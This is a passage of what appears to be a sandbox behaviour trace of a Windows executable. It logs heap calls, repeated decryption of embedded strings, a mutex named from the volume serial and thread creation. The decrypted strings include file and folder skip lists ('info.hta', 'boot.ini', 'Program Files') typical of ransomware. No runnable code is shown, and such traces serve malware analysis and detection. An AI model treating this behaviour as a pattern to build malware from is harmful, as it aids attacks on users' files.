Size=0x4) returned 0x7473a8 [0039.155] CryptGenRandom (in: hProv=0x23a100, dwLen=0x55, pbBuffer=0x41faaa | out: pbBuffer=0x41faaa) returned 1 [0039.155] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746c98 [0039.155] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x80) returned 0x871548 [0039.155] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746cb0 [0039.155] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x2) returned 0x7473b8 [0039.155] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x4) returned 0x7473c8 [0039.155] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746cc8 [0039.155] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x80) returned 0x875550 [0039.155] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746ce0 [0039.156] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x4) returned 0x7473d8 [0039.156] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x7473b8, Size=0x82) returned 0x879640 [0039.156] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x7473d8, Size=0x100) returned 0x8755d8 [0039.156] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746cf8 [0039.156] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x82) returned 0x8796d0 [0039.156] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746d10 [0039.156] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x82) returned 0x879760 [0039.156] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x8796d0, Size=0x104) returned 0x747790 [0039.156] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x8714c0, Size=0x100) returned 0x7478a0 [0039.156] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x879640, Size=0x104) returned 0x7479a8 [0039.156] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x8755d8, Size=0x200) returned 0x747ab8 [0039.157] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x7473c8 | out: hHeap=0x870000) returned 1 [0039.157] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x747ab8 | out: hHeap=0x870000) returned 1 [0039.157] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x746ce0 | out: hHeap=0x870000) returned 1 [0039.157] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871548 | out: hHeap=0x870000) returned 1 [0039.157] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x746c98 | out: hHeap=0x870000) returned 1 [0039.157] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875550 | out: hHeap=0x870000) returned 1 [0039.157] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x746cc8 | out: hHeap=0x870000) returned 1 [0039.157] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x7479a8 | out: hHeap=0x870000) returned 1 [0039.157] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x746cb0 | out: hHeap=0x870000) returned 1 [0039.157] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x747790 | out: hHeap=0x870000) returned 1 [0039.158] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x746cf8 | out: hHeap=0x870000) returned 1 [0039.158] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x879760 | out: hHeap=0x870000) returned 1 [0039.158] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x746d10 | out: hHeap=0x870000) returned 1 [0039.158] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875868 | out: hHeap=0x870000) returned 1 [0039.158] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x746c38 | out: hHeap=0x870000) returned 1 [0039.158] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8795b0 | out: hHeap=0x870000) returned 1 [0039.158] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x746c68 | out: hHeap=0x870000) returned 1 [0039.158] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x7478a0 | out: hHeap=0x870000) returned 1 [0039.158] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x746c50 | out: hHeap=0x870000) returned 1 [0039.158] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x7473a8 | out: hHeap=0x870000) returned 1 [0039.158] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x746c80 | out: hHeap=0x870000) returned 1 [0039.158] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875838 | out: hHeap=0x870000) returned 1 [0039.158] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8714a0 | out: hHeap=0x870000) returned 1 [0039.158] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0xa4) returned 0x8714a0 [0039.158] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x62) returned 0x871550 [0039.158] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x871550, Size=0xc2) returned 0x871550 [0039.159] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746c80 [0039.159] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0xb40) returned 0x87c0e8 [0039.159] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f9dc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa44 | out: phKey=0x41fa44*=0x23a350) returned 1 [0039.159] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41fa2c, dwFlags=0x0) returned 1 [0039.159] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x87c0e8, pdwDataLen=0x41f9f8 | out: pbData=0x87c0e8, pdwDataLen=0x41f9f8) returned 1 [0039.159] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.159] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746c50 [0039.159] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f9d4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa3c | out: phKey=0x41fa3c*=0x23a350) returned 1 [0039.159] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41fa24, dwFlags=0x0) returned 1 [0039.159] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x746c50, pdwDataLen=0x41f9f0 | out: pbData=0x746c50, pdwDataLen=0x41f9f0) returned 1 [0039.159] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.159] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x875550 [0039.159] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f9ac, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa14 | out: phKey=0x41fa14*=0x23a350) returned 1 [0039.159] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41f9fc, dwFlags=0x0) returned 1 [0039.159] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x875550, pdwDataLen=0x41f9c8 | out: pbData=0x875550, pdwDataLen=0x41f9c8) returned 1 [0039.159] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.160] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x84) returned 0x8795b0 [0039.160] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x84) returned 0x879760 [0039.160] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x8755e8 [0039.160] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f984, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41f9ec | out: phKey=0x41f9ec*=0x23a350) returned 1 [0039.160] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41f9d4, dwFlags=0x0) returned 1 [0039.160] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8755e8, pdwDataLen=0x41f9a0 | out: pbData=0x8755e8, pdwDataLen=0x41f9a0) returned 1 [0039.160] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.160] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8755e8 | out: hHeap=0x870000) returned 1 [0039.160] ExpandEnvironmentStringsW (in: lpSrc="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys", lpDst=0x8795b0, nSize=0x42 | out: lpDst="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys") returned 0x42 [0039.160] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x879760 | out: hHeap=0x870000) returned 1 [0039.160] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875550 | out: hHeap=0x870000) returned 1 [0039.160] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x60) returned 0x875550 [0039.160] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f9a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa10 | out: phKey=0x41fa10*=0x23a350) returned 1 [0039.160] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41f9f8, dwFlags=0x0) returned 1 [0039.160] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x875550, pdwDataLen=0x41f9c4 | out: pbData=0x875550, pdwDataLen=0x41f9c4) returned 1 [0039.160] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.160] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x5c) returned 0x8755b8 [0039.160] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x5c) returned 0x875620 [0039.160] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x875688 [0039.161] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f980, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41f9e8 | out: phKey=0x41f9e8*=0x23a350) returned 1 [0039.161] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41f9d0, dwFlags=0x0) returned 1 [0039.161] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x875688, pdwDataLen=0x41f99c | out: pbData=0x875688, pdwDataLen=0x41f99c) returned 1 [0039.161] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.161] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875688 | out: hHeap=0x870000) returned 1 [0039.161] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows;Program Files;Program Files (x86);", lpDst=0x8755b8, nSize=0x2e | out: lpDst="C:\\Windows;Program Files;Program Files (x86);") returned 0x2e [0039.161] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875620 | out: hHeap=0x870000) returned 1 [0039.161] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875550 | out: hHeap=0x870000) returned 1 [0039.161] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20a) returned 0x747790 [0039.161] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20a) returned 0x7479a8 [0039.161] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7479a8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe")) returned 0x2e [0039.161] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x7479a8 | out: hHeap=0x870000) returned 1 [0039.161] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0xb38) returned 0x87cc30 [0039.162] GetLastError () returned 0x0 [0039.162] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x879760, Size=0x98) returned 0x875620 [0039.162] GetLastError () returned 0x0 [0039.162] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1241edc, lpParameter=0x41fbe0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x94 [0039.163] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1241da2, lpParameter=0x41fbf8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x98 [0039.164] WaitForMultipleObjects (nCount=0x3, lpHandles=0x41fc08*=0x8c, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 6 os_tid = 0x994 [0039.122] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20) returned 0x8714d8 [0039.122] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdc8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe30 | out: phKey=0xaefe30*=0x23a100) returned 1 [0039.122] CryptSetKeyParam (hKey=0x23a100, dwParam=0x1, pbData=0xaefe18, dwFlags=0x0) returned 1 [0039.122] CryptDecrypt (in: hKey=0x23a100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8714d8, pdwDataLen=0xaefde4 | out: pbData=0x8714d8, pdwDataLen=0xaefde4) returned 1 [0039.122] CryptDestroyKey (hKey=0x23a100) returned 1 [0039.122] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x8716c0 [0039.122] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x1e) returned 0x8716e8 [0039.122] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x875ed0 [0039.122] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefda0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe08 | out: phKey=0xaefe08*=0x23a100) returned 1 [0039.122] CryptSetKeyParam (hKey=0x23a100, dwParam=0x1, pbData=0xaefdf0, dwFlags=0x0) returned 1 [0039.122] CryptDecrypt (in: hKey=0x23a100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x875ed0, pdwDataLen=0xaefdbc | out: pbData=0x875ed0, pdwDataLen=0xaefdbc) returned 1 [0039.122] CryptDestroyKey (hKey=0x23a100) returned 1 [0039.122] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x870000) returned 1 [0039.123] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x8716c0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0039.123] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716e8 | out: hHeap=0x870000) returned 1 [0039.123] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8714d8 | out: hHeap=0x870000) returned 1 [0039.123] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaefe70, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaefe70*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0039.123] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716c0 | out: hHeap=0x870000) returned 1 [0039.123] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x40) returned 0x8716c0 [0039.123] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe64 | out: phKey=0xaefe64*=0x23a100) returned 1 [0039.123] CryptSetKeyParam (hKey=0x23a100, dwParam=0x1, pbData=0xaefe4c, dwFlags=0x0) returned 1 [0039.123] CryptDecrypt (in: hKey=0x23a100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8716c0, pdwDataLen=0xaefe18 | out: pbData=0x8716c0, pdwDataLen=0xaefe18) returned 1 [0039.123] CryptDestroyKey (hKey=0x23a100) returned 1 [0039.123] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x34) returned 0x871708 [0039.123] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0xa0 [0039.126] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0x0) returned 0x102 [0039.126] CloseHandle (hObject=0xa0) returned 1 [0039.126] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716c0 | out: hHeap=0x870000) returned 1 [0039.126] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871708 | out: hHeap=0x870000) returned 1 [0039.126] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20) returned 0x8714d8 [0039.126] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdc8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe30 | out: phKey=0xaefe30*=0x23a100) returned 1 [0039.126] CryptSetKeyParam (hKey=0x23a100, dwParam=0x1, pbData=0xaefe18, dwFlags=0x0) returned 1 [0039.127] CryptDecrypt (in: hKey=0x23a100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8714d8, pdwDataLen=0xaefde4 | out: pbData=0x8714d8, pdwDataLen=0xaefde4) returned 1 [0039.127] CryptDestroyKey (hKey=0x23a100) returned 1 [0039.127] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x8716c0 [0039.127] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x1e) returned 0x8716e8 [0039.127] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x875ed0 [0039.127] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefda0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe08 | out: phKey=0xaefe08*=0x23a100) returned 1 [0039.127] CryptSetKeyParam (hKey=0x23a100, dwParam=0x1, pbData=0xaefdf0, dwFlags=0x0) returned 1 [0039.127] CryptDecrypt (in: hKey=0x23a100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x875ed0, pdwDataLen=0xaefdbc | out: pbData=0x875ed0, pdwDataLen=0xaefdbc) returned 1 [0039.127] CryptDestroyKey (hKey=0x23a100) returned 1 [0039.127] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x870000) returned 1 [0039.127] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x8716c0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0039.127] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716e8 | out: hHeap=0x870000) returned 1 [0039.127] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8714d8 | out: hHeap=0x870000) returned 1 [0039.127] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaefe70, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaefe70*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0039.128] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716c0 | out: hHeap=0x870000) returned 1 [0039.128] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x40) returned 0x8716c0 [0039.128] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe64 | out: phKey=0xaefe64*=0x23a100) returned 1 [0039.128] CryptSetKeyParam (hKey=0x23a100, dwParam=0x1, pbData=0xaefe4c, dwFlags=0x0) returned 1 [0039.128] CryptDecrypt (in: hKey=0x23a100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8716c0, pdwDataLen=0xaefe18 | out: pbData=0x8716c0, pdwDataLen=0xaefe18) returned 1 [0039.128] CryptDestroyKey (hKey=0x23a100) returned 1 [0039.128] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x34) returned 0x871708 [0039.128] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0xa0 [0039.132] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0x0) returned 0x102 [0039.132] CloseHandle (hObject=0xa0) returned 1 [0039.132] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716c0 | out: hHeap=0x870000) returned 1 [0039.133] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871708 | out: hHeap=0x870000) returned 1 [0039.133] Sleep (dwMilliseconds=0x3e8) [0041.030] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20) returned 0x8716d8 [0041.030] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdc8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe30 | out: phKey=0xaefe30*=0x227558) returned 1 [0041.030] CryptSetKeyParam (hKey=0x227558, dwParam=0x1, pbData=0xaefe18, dwFlags=0x0) returned 1 [0041.030] CryptDecrypt (in: hKey=0x227558, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8716d8, pdwDataLen=0xaefde4 | out: pbData=0x8716d8, pdwDataLen=0xaefde4) returned 1 [0041.030] CryptDestroyKey (hKey=0x227558) returned 1 [0041.030] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x871700 [0041.030] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x1e) returned 0x871728 [0041.030] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x8756c0 [0041.030] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefda0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe08 | out: phKey=0xaefe08*=0x227558) returned 1 [0041.031] CryptSetKeyParam (hKey=0x227558, dwParam=0x1, pbData=0xaefdf0, dwFlags=0x0) returned 1 [0041.031] CryptDecrypt (in: hKey=0x227558, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8756c0, pdwDataLen=0xaefdbc | out: pbData=0x8756c0, pdwDataLen=0xaefdbc) returned 1 [0041.031] CryptDestroyKey (hKey=0x227558) returned 1 [0041.031] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8756c0 | out: hHeap=0x870000) returned 1 [0041.031] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x871700, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0041.031] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871728 | out: hHeap=0x870000) returned 1 [0041.031] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716d8 | out: hHeap=0x870000) returned 1 [0041.031] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaefe70, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaefe70*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0041.031] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871700 | out: hHeap=0x870000) returned 1 [0041.031] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x40) returned 0x8716d8 [0041.031] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe64 | out: phKey=0xaefe64*=0x227558) returned 1 [0041.031] CryptSetKeyParam (hKey=0x227558, dwParam=0x1, pbData=0xaefe4c, dwFlags=0x0) returned 1 [0041.031] CryptDecrypt (in: hKey=0x227558, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8716d8, pdwDataLen=0xaefe18 | out: pbData=0x8716d8, pdwDataLen=0xaefe18) returned 1 [0041.031] CryptDestroyKey (hKey=0x227558) returned 1 [0041.031] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x34) returned 0x871720 [0041.031] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0xb8 [0041.031] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0041.031] CloseHandle (hObject=0xb8) returned 1 [0041.031] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716d8 | out: hHeap=0x870000) returned 1 [0041.031] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871720 | out: hHeap=0x870000) returned 1 [0041.032] Sleep (dwMilliseconds=0x3e8) [0042.489] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20) returned 0x8716d8 [0042.489] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdc8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe30 | out: phKey=0xaefe30*=0x22b630) returned 1 [0042.489] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefe18, dwFlags=0x0) returned 1 [0042.489] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8716d8, pdwDataLen=0xaefde4 | out: pbData=0x8716d8, pdwDataLen=0xaefde4) returned 1 [0042.489] CryptDestroyKey (hKey=0x22b630) returned 1 [0042.489] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x871700 [0042.489] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x1e) returned 0x871728 [0042.490] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x8756c0 [0042.490] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefda0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe08 | out: phKey=0xaefe08*=0x22b630) returned 1 [0042.490] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefdf0, dwFlags=0x0) returned 1 [0042.490] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8756c0, pdwDataLen=0xaefdbc | out: pbData=0x8756c0, pdwDataLen=0xaefdbc) returned 1 [0042.490] CryptDestroyKey (hKey=0x22b630) returned 1 [0042.490] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8756c0 | out: hHeap=0x870000) returned 1 [0042.490] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x871700, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0042.490] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871728 | out: hHeap=0x870000) returned 1 [0042.490] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716d8 | out: hHeap=0x870000) returned 1 [0042.490] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaefe70, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaefe70*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0042.490] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871700 | out: hHeap=0x870000) returned 1 [0042.490] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x40) returned 0x8716d8 [0042.490] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe64 | out: phKey=0xaefe64*=0x22b630) returned 1 [0042.491] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefe4c, dwFlags=0x0) returned 1 [0042.491] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8716d8, pdwDataLen=0xaefe18 | out: pbData=0x8716d8, pdwDataLen=0xaefe18) returned 1 [0042.491] CryptDestroyKey (hKey=0x22b630) returned 1 [0042.491] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x34) returned 0x871720 [0042.491] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x14c [0042.491] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x0) returned 0x102 [0042.491] CloseHandle (hObject=0x14c) returned 1 [0042.491] HeapFree (in: hHeap=0x870000, 